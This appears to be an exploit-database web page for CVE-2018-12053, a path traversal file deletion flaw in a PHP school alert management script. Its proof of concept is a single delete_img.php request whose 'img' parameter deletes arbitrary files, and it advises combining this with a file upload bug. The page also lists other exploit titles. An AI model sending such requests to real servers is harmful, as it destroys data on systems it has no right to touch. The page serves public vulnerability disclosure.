Menu

Search for hundreds of thousands of exploits

"Schools Alert Management Script - Arbitrary File Deletion"

Author

Exploit author

M3@Pandas

Platform

Exploit platform

php

Release date

Exploit published date

2018-06-11

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
# Exploit Title: Schools Alert Management Script - Arbitrary File Deletion
# Date: 2018-06-07
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
# Category: Web Application
# Exploit Author: M3@Pandas
# Web: https://github.com/unh3x/just4cve/issues/6
# Tested on: Linux Mint
# CVE: CVE-2018-12053

# Proof of Concept:

/delete_img.php?img=./uploads/school_logos/1528_x1.php
# notice: There is a risk of file deletion,you'd better test it combined with file upload vulnerability.
# Attackers can delete any file through parameter 'img' with '../' .
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2018-06-11 "Schools Alert Management Script - 'get_sec.php' SQL Injection" webapps php M3@Pandas
2018-06-11 "Schools Alert Management Script - Arbitrary File Read" webapps php M3@Pandas
2018-06-11 "Schools Alert Management Script - SQL Injection" webapps php M3@Pandas
2018-06-11 "Schools Alert Management Script - Arbitrary File Deletion" webapps php M3@Pandas
2018-05-29 "NUUO NVRmini2 / NVRsolo - Arbitrary File Upload" webapps hardware M3@Pandas
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.